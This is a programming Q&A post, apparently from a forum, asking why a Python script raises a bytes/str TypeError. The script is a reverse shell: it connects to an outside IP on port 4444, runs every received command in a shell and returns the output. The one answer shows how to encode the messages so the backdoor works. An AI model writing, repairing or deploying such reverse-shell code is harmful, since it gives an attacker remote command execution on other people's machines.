# Python ERROR TypeError: a bytes-like object is required, not 'str'

Tags: python, string, typeerror

I don't understand what is the problem please help

when run in console it gives the following error :

```
TypeError: a bytes-like object is required, not 'str'
```

```
#!/usr/bin/env python

import socket
import subprocess

def execute_system_command(command):
    return subprocess.check_output(command, shell = True)

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect(("213.32.21.3", 4444))

connection.send("\n[+] Connection established. \n")

while True:
    command = connection.recv(1024)
    command_result = execute_system_command(command)
    connection.send(command_result)

    connection.close()
```

Comment: Please post the entire stack trace of your error so people can easily identify the line where the error happens.

Answer (score 0):

You need to send your message as bytes and not as str.
Just do this:

```
connection.send(bytes(<Your Message>, "utf-8"))
```

Parse your message as first parameter for the bytes function.